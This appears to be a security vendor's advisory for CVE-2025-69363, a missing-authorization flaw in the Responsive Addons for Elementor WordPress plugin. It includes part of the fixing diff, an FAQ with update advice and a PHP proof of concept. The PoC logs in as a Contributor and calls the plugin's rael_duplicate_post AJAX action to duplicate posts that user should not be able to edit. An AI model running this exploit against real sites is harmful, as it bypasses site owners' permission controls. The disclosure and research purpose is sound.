+					'bars'  => __( 'Bars', 'responsive-addons-for-elementor' ),
+				),
+				'prefix_class' => 'rael-pagination-style-',
+				'condition' => array(
+					'pagination' => 'bullets',
+				),
+			)
+		);
+
+			$this->add_control(
 			'pagination_size',
 			array(
 				'label'     => __( 'Size', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::SLIDER,
 				'range'     => array(
 					'px' => array(
-						'max' => 20,
+						'max' => 20,
 					),
 				),
+				'default'   => array(
+					'size' => 13,
+					'unit' => 'px',
+				),
 				'selectors' => array(
-					'{{WRAPPER}} .swiper-pagination-bullet' => 'height: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .swiper-horizontal .swiper-pagination-progressbar' => 'height: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .swiper-pagination-fraction' => 'font-size: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}}.rael-pagination-style-solid_circle .swiper-pagination-bullet' =>
+						'height: {{SIZE}}{{UNIT}} !important; width: {{SIZE}}{{UNIT}} !important; border-radius: 50% !important;',
+
+					'{{WRAPPER}}.rael-pagination-style-outline_circle .swiper-pagination-bullet' =>
+						'height: {{SIZE}}{{UNIT}} !important; width: {{SIZE}}{{UNIT}} !important; border-radius: 50% !important;',
+
+					'{{WRAPPER}}.rael-pagination-style-bars .swiper-pagination-bullet' =>
+						'width: {{SIZE}}{{UNIT}} !important; height: 5px !important; border-radius: 10px !important;',
+
+					'{{WRAPPER}} .swiper-horizontal .swiper-pagination-progressbar' =>
+						'height: {{SIZE}}{{UNIT}} !important;',
+
+					'{{WRAPPER}} .swiper-pagination-fraction' =>
+						'font-size: {{SIZE}}{{UNIT}} !important;',
 				),
 				'condition' => array(
 					'pagination!' => '',
@@ -1128,14 +1298,27 @@
 			)
 		);

+
 		$this->add_control(
 			'pagination_color',
 			array(
 				'label'     => __( 'Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
+				'default'   => '#cccccc',
 				'selectors' => array(
 					'{{WRAPPER}} .swiper-pagination-bullet:not(.swiper-pagination-bullet-active), {{WRAPPER}} .swiper-pagination-progressbar' => 'background-color: {{VALUE}}; opacity: 1;',
 					'{{WRAPPER}} .swiper-pagination-fraction' => 'color: {{VALUE}}',
+					/* Solid Circle – inactive bullets */
+					'{{WRAPPER}}.rael-pagination-style-solid_circle .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: {{VALUE}}; opacity: 1;',
+
+					/* Outline Circle – inactive bullets */
+					'{{WRAPPER}}.rael-pagination-style-outline_circle .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: transparent; border: 2px solid {{VALUE}}; opacity: 1;',
+
+					/* Bars – inactive bars */
+					'{{WRAPPER}}.rael-pagination-style-bars .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: {{VALUE}};',
 				),
 				'condition' => array(
 					'pagination!' => '',
@@ -1148,6 +1331,7 @@
 			array(
 				'label'     => __( 'Active Dot Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
+				'default'   => '#000000',
 				'selectors' => array(
 					'{{WRAPPER}} .swiper-pagination-bullet-active' => 'background-color: {{VALUE}}',
 				),
@@ -1410,7 +1594,8 @@
 				</div>
 				<?php if ( 1 < $slides_count ) : ?>
 					<?php if ( $settings['pagination'] ) : ?>
-						<div class="swiper-pagination"></div>
+
+							<div class="swiper-pagination"></div>
 					<?php endif; ?>
 					<?php if ( $settings['show_arrows'] ) : ?>
 						<?php
@@ -1516,6 +1701,27 @@
 					?>
 				</div>
 				<div class="responsive-testimonial__content">
+					<?php
+						if($settings['enable_rating'] == 'yes') {
+							$rating = intval( $slide['testimonial_rating'] );
+
+							echo '<div class="rael-rating-stars">';
+
+							// filled stars
+							for ( $i = 0; $i < $rating; $i++ ) {
+								echo '<i class="fas fa-star"></i>';
+							}
+
+							// outlined stars
+							for ( $i = $rating; $i < 5; $i++ ) {
+								echo '<i class="far fa-star"></i>';
+							}
+
+							echo '</div>';
+						}
+
+					?>
+
 					<div class="responsive-testimonial__text">
 						<?php echo esc_html( $slide['content'] ); ?>
 					</div>
--- a/responsive-addons-for-elementor/responsive-addons-for-elementor.php
+++ b/responsive-addons-for-elementor/responsive-addons-for-elementor.php
@@ -3,7 +3,7 @@
  * Plugin Name: Responsive Addons for Elementor
  * Plugin URI:  https://cyberchimps.com/responsive-addons-for-elementor/
  * Description: Responsive Addons for Elementor plugin adds Elementor widgets and seamlessly integrates with any Elementor Package (Free, Pro). It is compatible with all popular WordPress themes.
- * Version:     2.0.8
+ * Version:     2.0.9
  * Author:      Cyberchimps.com
  * Author URI:  https://cyberchimps.com/responsive-addons-for-elementor/
  * License:     GPL v2 or later
@@ -22,7 +22,7 @@
 	exit;
 }

-define( 'RAEL_VER', '2.0.8' );
+define( 'RAEL_VER', '2.0.9' );
 define( 'RAEL_DIR', plugin_dir_path( __FILE__ ) );
 define( 'RAEL_URL', plugins_url( '/', __FILE__ ) );
 define( 'RAEL_PATH', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69363 - Responsive Addons for Elementor <= 2.0.8 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-69363
 * Requires Contributor-level WordPress credentials
 * Demonstrates unauthorized post duplication via AJAX endpoint
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_password';
$target_post_id = 123; // ID of post to duplicate (should not be editable by contributor)

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Extract login nonce (simplified - real implementation would parse HTML)
// WordPress uses 'log' and 'pwd' parameters for login

// Step 2: Authenticate to WordPress
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 3: Exploit missing authorization via AJAX endpoint
// The vulnerable endpoint is /wp-admin/admin-ajax.php with action=rael_duplicate_post
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Create nonce for the duplicate action (required by the plugin)
// In real exploitation, the attacker would obtain this nonce from the admin interface
// or from the rae_get_duplicate_link function output
$nonce = 'rael_duplicate_post_' . $target_post_id;

$exploit_params = [
    'action' => 'rael_duplicate_post',
    'post' => $target_post_id,
    '_wpnonce' => $nonce
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_params);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);

// Step 4: Check if duplication was successful
if (strpos($response, 'admin.php?post=') !== false || strpos($response, 'post duplicated') !== false) {
    echo "[SUCCESS] Post #$target_post_id duplicated without proper authorizationn";
    echo "Response: " . htmlspecialchars(substr($response, 0, 500)) . "n";
} else {
    echo "[FAILED] Exploit attempt blocked or failedn";
    echo "Response: " . htmlspecialchars(substr($response, 0, 500)) . "n";
}

// Alternative exploitation via bulk actions (admin interface)
echo "nAlternative method: Bulk action duplication via /wp-admin/edit.phpn";
echo "Contributor users can access bulk actions menu and select 'Duplicate'n";
echo "for posts they should not have permission to edit.n";

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-69363?
Overview of the vulnerability
CVE-2025-69363 is a medium severity vulnerability in the Responsive Addons for Elementor plugin for WordPress, affecting versions up to and including 2.0.8. It involves a missing authorization check that allows authenticated users with Contributor-level access or higher to perform unauthorized actions, specifically duplicating posts.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of capability checks in the post duplication functionality of the plugin. Authenticated users can access specific AJAX endpoints to duplicate posts they should not have permission to modify, including published and password-protected content.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using the Responsive Addons for Elementor plugin version 2.0.8 or earlier is affected. Users with Contributor-level access or higher can exploit this vulnerability to duplicate posts without proper authorization.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Responsive Addons for Elementor plugin installed on your WordPress site. If it is version 2.0.8 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this issue?
Recommended actions
The vulnerability is fixed in version 2.0.9 of the Responsive Addons for Elementor plugin. Update the plugin to the latest version to mitigate the risk. Additionally, review user permissions and restrict access for Contributor-level users as a precaution.
What does the CVSS score of 4.3 mean?
Understanding the severity rating
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on the site, especially if exploited by authenticated users.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability allows attackers to duplicate any post on the site, which can lead to unauthorized copies of sensitive content and disrupt content management. Although it does not directly escalate privileges, it undermines the intended permission model of WordPress.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an authenticated user with Contributor-level credentials can exploit the vulnerability to duplicate posts via the AJAX endpoint. It involves sending a crafted request to the WordPress admin-ajax.php with the action parameter set to duplicate a post.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider temporarily disabling the plugin or restricting access to Contributor-level users. Monitor user activities and review logs for any unauthorized actions until the plugin can be updated.
Are there any other security measures I should take?
Enhancing overall site security
In addition to updating the plugin, ensure that all WordPress components are regularly updated, implement strong user access controls, and consider using security plugins that monitor for unauthorized changes or access attempts.
Where can I find more information about CVE-2025-69363?
Resources for further reading
More information about CVE-2025-69363 can be found on the National Vulnerability Database (NVD) and other security advisory platforms. Additionally, the plugin’s changelog and support forums may provide updates and discussions related to this vulnerability.
How can I report any suspicious activity related to this vulnerability?
Steps for reporting
If you suspect that your site has been compromised due to this vulnerability, report the activity to your hosting provider and consider engaging a security professional. Document any suspicious actions and gather logs to assist in the investigation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations